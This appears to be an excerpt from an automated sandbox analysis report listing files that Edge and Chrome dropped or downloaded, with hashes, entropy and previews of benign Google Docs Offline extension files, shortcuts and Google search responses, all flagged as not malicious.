                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):843
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                          MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                          SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                          SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                          SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):912
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                          MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                          SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                          SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                          SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):11406
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                                          MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                                          SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                                          SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                                          SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):854
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                          MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                          SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                          SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                          SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2525
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                                          MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                                          SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                                          SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                                          SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                          MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                          SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                          SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                          SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):122218
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                                          MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                                          SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                                          SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                                          SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):291
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                          MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                          SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                          SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                          SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):130866
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                                          MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                                          SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                                          SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                                          SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 15:22:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2677
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9878965204760166
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8D2dRjT5JJfH2idAKZdA19ehwiZUklqehRy+3:8DMjnJ0+y
                                                                                                                                                                                                                                                                                                                          MD5:D6C88BB115238F044502A05438AFBC36
                                                                                                                                                                                                                                                                                                                          SHA1:06644BDFC74E488B9E315146EA0E605C1781A596
                                                                                                                                                                                                                                                                                                                          SHA-256:F701592ECFECE21C55E12ACFF1408013D857DF4AA3C36BD8B790E899DBAB6707
                                                                                                                                                                                                                                                                                                                          SHA-512:CD433117AE0E5218FA8E81BFE48AC6F3570BB29D6489144F894F59557DBC181D3C2D9C5B86E1E2DB8E0D040E529A06A7573D580A092972EF5B40BDB540145E67
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 15:22:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2679
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.998653699109375
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8X0M2dRjT5JJfH2idAKZdA1weh/iZUkAQkqehuy+2:8EMMjnJG9Qzy
                                                                                                                                                                                                                                                                                                                          MD5:66D88313A739178AAF0EC82E18E35F23
                                                                                                                                                                                                                                                                                                                          SHA1:6C420537B3F3A6B84000F6230BC059AE373127F3
                                                                                                                                                                                                                                                                                                                          SHA-256:622679AAA822428DFB26871A6C24F1A0437803533098EC97E7D6EDDDB6F20D85
                                                                                                                                                                                                                                                                                                                          SHA-512:5AC7AC8EF78B61310E4FBE6F53E09A45CFCB68003F1E9028CF652478FC5BE160328766F431AA718D75069A149185E9C75F9A34E98072F20E4689599238D6B722
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2693
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.012031383982431
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8xKdRjT5JsH2idAKZdA14tseh7sFiZUkmgqeh7sYy+BX:8xgjnHnqy
                                                                                                                                                                                                                                                                                                                          MD5:4034C1747F9310C27DDEE0922FF80CCE
                                                                                                                                                                                                                                                                                                                          SHA1:39EACD92CD4481F6F68D8B1D447B51FAD877750F
                                                                                                                                                                                                                                                                                                                          SHA-256:E2ED38A1CF2951042D539864CC36D2AB802CD3AE94B641E1B99FD80BBF108FFB
                                                                                                                                                                                                                                                                                                                          SHA-512:38C062E757C4F1FD9985DB9CEE8E8381C2D7A88A930D07037C38BBA6C4E30C787D310DDA9543B53140D85D2E3C266DCB26F4255C797172D83F2895BE3AFBDA19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 15:22:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9991865250141743
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8x2dRjT5JJfH2idAKZdA1vehDiZUkwqehCy+R:8xMjnJNQy
                                                                                                                                                                                                                                                                                                                          MD5:3678F19793ED0A213C2A07AF8C3C6AB1
                                                                                                                                                                                                                                                                                                                          SHA1:ED6AD31282496E392BAFB54B7F8F7B58095DBBF2
                                                                                                                                                                                                                                                                                                                          SHA-256:E2CA396258C0A06C83898322F1EB0DFDCD42CEDA1412FC772948322085090F20
                                                                                                                                                                                                                                                                                                                          SHA-512:2E511DA63E8951DF11CB10DE392562DC4864229F298BC992B2E15BDA32BFCC128A70E481451F7DA42863321A657B505CC25301B78F786101FAA05D868EC062DE
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 15:22:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9877998443359073
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:812dRjT5JJfH2idAKZdA1hehBiZUk1W1qehEy+C:81MjnJN9ky
                                                                                                                                                                                                                                                                                                                          MD5:166328156AFC8800A281047363798898
                                                                                                                                                                                                                                                                                                                          SHA1:89C0DC9DD881742D1D1C22C797EB7B6A38E83DB2
                                                                                                                                                                                                                                                                                                                          SHA-256:21BA24F220A28CBC6D02EF93B422EF62BF9F763AE5A95FB54C2B0E2CDE72A0CE
                                                                                                                                                                                                                                                                                                                          SHA-512:328B61AE04A260E77FEA1190761F2A8B93AD8AE27A9D0E4373C0815B919C8ABC9FEDFF7D6381849404ACEADBCEBB5B37114659E7F52C1DA85DC5FBB502320C85
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jan 12 15:22:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2683
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.000283553980555
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:8x2dRjT5JJfH2idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbqy+yT+:8xMjnJRT/TbxWOvTbqy7T
                                                                                                                                                                                                                                                                                                                          MD5:D49049D16B46F1464435913A2E7D143D
                                                                                                                                                                                                                                                                                                                          SHA1:397E3F5A356DC0B3B32281349299F5D42CC2BB11
                                                                                                                                                                                                                                                                                                                          SHA-256:ED122223D9539040FF936DF37429F88D9AC92ACACF5A6C8AE4587E3042572B08
                                                                                                                                                                                                                                                                                                                          SHA-512:C1DA6D99B6202C8F7C9BB512C6748B4F65C1607113CE63E29B1500BF001D88BDD6DC9347B67C2E8A433AFADBD9AB0905FB649B72864ADF76B60CBA5338F4BE78
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8911)
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):8917
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.777967480289095
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:/ukH6666d0Uea9uH6666Yr8U2Bo8IPmgH6666YGdoFErng9YT:/ukH6666dveawH6666YrvnQgH6666YGn
                                                                                                                                                                                                                                                                                                                          MD5:AA66FF39A43EBE674344CD671AC7744F
                                                                                                                                                                                                                                                                                                                          SHA1:4784C5C9681C83DA978B3B0CD4B6284ADA285E45
                                                                                                                                                                                                                                                                                                                          SHA-256:3BE6C58E5CD1F62933B412832C92D37A2C5FB65A531E5425AF9AE4F08A50DA66
                                                                                                                                                                                                                                                                                                                          SHA-512:D1BD3A2C66495279A5C2E860FE9776C460CBD2D57317284F8E9E5F6A368F560143958028FA6C9B8D678B847FAF67F00611FEC73D3B75DBD52AD0ED865C0AFC1A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                                          Preview:)]}'.["",["cutter gauthier philadelphia flyers","nyt strands hints","nevada civil forfeiture ruling","bitcoin hard drive landfill","apple iphone 17 pro max","winter storm cora snowfall totals","r.ki sasaki","american primeval netflix"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"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
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):176106
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.550039490877255
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:eEBOdc32TMLUtSdEsN4FP5/278Ivoh9NmxVhTaLB80G5JCk2mlNwfQuJq+CjQDI/:eKOdcPLUtSdn4P5/y8Iwh9NmX5aLB80o
                                                                                                                                                                                                                                                                                                                          MD5:D64C0D9594ACD5B48E6C6A4A48494A2C
                                                                                                                                                                                                                                                                                                                          SHA1:F39C02870860A3F0563B47D753699E8095578DFE
                                                                                                                                                                                                                                                                                                                          SHA-256:A2E707230996D82F27A3EC406290353D4DF89A967693D454A57E14896509D87B
                                                                                                                                                                                                                                                                                                                          SHA-512:F6DA048855D3B2D05F0A11E90206209FF991EEEA1926A298B17D1DE48E85E1E2334CF7885C772AB109FCC372FB5B6DA8A328AC901653C87CDAFC3B0A9607D3C4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.rX6uZdQxZxU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvH0Rknr6hXqx-tgqAUuIv05wLZhQ"
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                                          MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                                          SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                                          SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                                          SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_promos
